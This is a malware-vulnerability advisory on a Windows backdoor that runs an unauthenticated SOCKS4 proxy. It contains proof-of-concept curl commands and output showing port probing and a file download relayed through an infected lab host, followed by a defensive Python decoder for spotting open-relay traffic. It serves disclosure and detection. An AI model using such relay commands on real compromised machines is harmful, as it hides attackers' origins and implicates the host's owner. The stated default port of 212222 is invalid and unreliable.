Credits: Malvuln (John Page, aka Hyp3rlinx), Discovery (c) 2022
Original source: https://malvuln.com/advisory/f312e3a436995b86b205a1a37b1bf10f.txt
Contact: [email protected]
Media: twitter.com/malvuln
Backup media: infosec.exchange/@malvuln
Threat: Backdoor.Win32.Serman.a
Vulnerability: Unauthenticated Open Proxy
Family: Serman
Type: PE32
MD5: f312e3a436995b86b205a1a37b1bf10f
Vuln ID: MVID-2022-0659
Disclosure: 11/22/2022
Description: The malware listens on TCP port 212222 by default, but this can be modified. Third-party attackers who can connect to an infected system can relay requests through it, hiding their originating connection. An attacker may be able to launch attacks or download files from third-party systems, which makes it appear that the attack originated from the infected host.
E.g. using port 5555
Socks4 version 4A server beta
autor: Stanimir Jordanov * e-mail: [email protected]
Usage: socks4 [LogFile]
C:\dump>wwm.exe 5555 out.txt
SOCKS 4 service started: redirecting localhost:5555
To end, press Ctrl+C
Connecting to:
Connected with: 192.168.18.128:80 ID:2C34
Closed ID:2C34
Connecting to:
Connected with: 192.168.18.128:80 ID:25BC
Connect closed ID:25BC
Connecting to:
Connected with: 192.168.18.128:80 ID:A4
Connect closed ID:A4
Exploit/PoC:

(Port scan, proxy log output):
Connecting to:
Could not connect to:
Connecting to:
Connected with: 192.168.18.128:21 ID:2DE4
Connect closed ID:2DE4

(Port closed):
C:\Users\gg\Desktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128:666 -v
* Trying 192.168.18.125:5555...
* SOCKS4 communication to 192.168.18.128:666
* SOCKS4 connect to IPv4 192.168.18.128 (locally resolved)
* Can't complete SOCKS4 connection to 0.0.0.0:0. (91), request rejected or failed.
* Closing connection 0
curl: (97) Can't complete SOCKS4 connection to 0.0.0.0:0. (91), request rejected or failed.
(Port open):
C:\Users\gg\Desktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128:21 -v
* Trying 192.168.18.125:5555...
* SOCKS4 communication to 192.168.18.128:21
* SOCKS4 connect to IPv4 192.168.18.128 (locally resolved)
* SOCKS4 request granted.
* Connected to 192.168.18.125 port 5555 (#1)
> GET / HTTP/1.1
> Host: 192.168.18.128:21
> User-Agent: curl/7.83.1
> Accept: */*
>
* Received HTTP/0.9 when not allowed
* Closing connection 0
curl: (1) Received HTTP/0.9 when not allowed
(Download files):
C:\Users\gg\Desktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128/DOOM.exe -v --output 2.txt
* Trying 192.168.18.125:5555...
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* SOCKS4 communication to 192.168.18.128:80
* SOCKS4 connect to IPv4 192.168.18.128 (locally resolved)
* SOCKS4 request granted.
* Connected to 192.168.18.125 port 5555 (#1)
> GET /DOOM.exe HTTP/1.1
> Host: 192.168.18.128
> User-Agent: curl/7.83.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.6
Date: Tue, 22 Nov 2022 02:15:31 GMT
Content-type: application/x-msdos-program
Content-Length: 103533
Last-Modified: Sat, 03/08/2019 04:57 PM GMT
{ [6794 bytes data]
100  101k  100  101k    0     0   474k      0 --:--:-- --:--:-- --:--:--  488k
* Closing connection 0

C:\Users\gg\Desktop>2.txt
DOOMED!! !
Press any key to continue . . .
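The PoC above works because the sample speaks plain SOCKS4/4A with no credential check: the client sends VN=4, a command byte, the destination port and IPv4 address, and a NUL-terminated USERID (SOCKS4A appends a hostname when the address is 0.0.0.x); the proxy answers with VN=0 and a result code, 0x5A (90) for granted or 0x5B (91) for rejected, which is the "(91)" curl printed for the closed port, with the address fields zeroed, hence "0.0.0.0:0". The following Python decoder is an added example written for this advisory, not code from the advisory, from the malware, or from curl. The sample bytes are constructed to model the PoC flows (they were not captured from the sample), and describe_relay is a hypothetical triage helper that turns one request/reply pair into a log line and makes the tell of an open relay visible: a GRANTED verdict with no USERID at all.

```python
import ipaddress
import struct

# SOCKS4 reply result codes (CD byte of the 8-byte reply).
REPLY_CODES = {
    0x5A: "request granted",                      # 90
    0x5B: "request rejected or failed",           # 91, what curl printed for the closed port
    0x5C: "rejected: client identd unreachable",  # 92
    0x5D: "rejected: identd user-id mismatch",    # 93
}


def parse_socks4_request(data):
    """Decode a SOCKS4 or SOCKS4A request.

    Layout: VN(1)=4 | CD(1): 1=CONNECT, 2=BIND | DSTPORT(2, big-endian) | DSTIP(4)
            | USERID ... NUL | [SOCKS4A only: hostname ... NUL]
    SOCKS4A is signalled by DSTIP = 0.0.0.x with x != 0; the real target is the hostname.
    """
    if len(data) < 9:
        raise ValueError("too short for a SOCKS4 request")
    version, command, port = struct.unpack("!BBH", data[:4])
    if version != 4:
        raise ValueError("not a SOCKS4 request (VN=%d)" % version)
    if command not in (1, 2):
        raise ValueError("unknown SOCKS4 command %d" % command)
    dst_ip = ipaddress.IPv4Address(data[4:8])
    # Everything after DSTIP is NUL-separated: [USERID, (hostname), trailing empty piece]
    fields = data[8:].split(b"\x00")
    if len(fields) < 2:
        raise ValueError("USERID is not NUL-terminated")
    hostname = None
    if 0 < int(dst_ip) < 256:
        if len(fields) < 3:
            raise ValueError("SOCKS4A hostname is not NUL-terminated")
        hostname = fields[1].decode("latin-1")
    return {
        "command": "CONNECT" if command == 1 else "BIND",
        "dst_ip": str(dst_ip),
        "dst_port": port,
        "userid": fields[0].decode("latin-1"),
        "hostname": hostname,
    }


def parse_socks4_reply(data):
    """Decode the 8-byte SOCKS4 reply: VN(1)=0 | CD(1) result | DSTPORT(2) | DSTIP(4)."""
    if len(data) < 8:
        raise ValueError("too short for a SOCKS4 reply")
    version, code, port = struct.unpack("!BBH", data[:4])
    if version != 0:
        raise ValueError("SOCKS4 reply must carry VN=0 (got %d)" % version)
    return {
        "code": code,
        "granted": code == 0x5A,
        "status": REPLY_CODES.get(code, "unknown result code %d" % code),
        # On rejection servers commonly leave these zeroed, hence curl's "0.0.0.0:0".
        "bind_ip": str(ipaddress.IPv4Address(data[4:8])),
        "bind_port": port,
    }


def describe_relay(client, request_bytes, reply_bytes):
    """Hypothetical triage helper: one line per proxied flow, as an analyst would log it.

    A GRANTED verdict with 'no userid' is the tell of an unauthenticated open relay:
    the proxy forwarded a third party's request without any credential at all.
    """
    req = parse_socks4_request(request_bytes)
    rep = parse_socks4_reply(reply_bytes)
    target = req["hostname"] or req["dst_ip"]
    auth = "no userid" if req["userid"] == "" else "userid %r" % req["userid"]
    verdict = "GRANTED" if rep["granted"] else "REJECTED (%d)" % rep["code"]
    return "%s -> proxy %s %s:%d (%s): %s" % (
        client, req["command"], target, req["dst_port"], auth, verdict)


# Constructed sample bytes modelling the PoC flows (not captured from the sample).
_TARGET = bytes([192, 168, 18, 128])
CONNECT_FTP = b"\x04\x01" + struct.pack("!H", 21) + _TARGET + b"\x00"     # empty USERID
CONNECT_CLOSED = b"\x04\x01" + struct.pack("!H", 666) + _TARGET + b"\x00"
REPLY_GRANTED = b"\x00\x5a" + struct.pack("!H", 21) + _TARGET
REPLY_REJECTED = b"\x00\x5b" + b"\x00" * 6                                 # 91, fields zeroed
CONNECT_4A = (b"\x04\x01" + struct.pack("!H", 80) + b"\x00\x00\x00\x01"
              + b"\x00" + b"files.example.test\x00")                      # SOCKS4A form

if __name__ == "__main__":
    print(describe_relay("10.0.0.5", CONNECT_FTP, REPLY_GRANTED))
    print(describe_relay("10.0.0.5", CONNECT_CLOSED, REPLY_REJECTED))
    print(describe_relay("10.0.0.5", CONNECT_4A, REPLY_GRANTED))
```

Run over the first bytes of each TCP stream to the listening port (taken from a capture on the infected host or a network sensor), the decoder yields one line per relayed flow; a stream of GRANTED lines with no USERID, each naming a different destination the infected host has no business contacting, is the network-side evidence that the host is being used as an open relay, and the infected host's own address, not the third party's, is what the destination will have logged.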
Disclaimer: This advisory information is provided "as-is," without warranties, guarantees or other conditions. This advisory may be redistributed, subject to its original form and credit. For inclusion in vulnerability databases or similar programs, permission is granted explicitly provided credit is given to the author. The author is not responsible for misuse or misappropriation of information and does not accept responsibility for damages resulting from the misuse. Any malicious or illegal use of security-related information, exploits or other methods is prohibited by the author. You should not try to obtain Malware samples. This website does not accept responsibility for damages resulting from Malware handling errors or downloading any Malware. All content copyrighted (c) Malvuln.com (TM)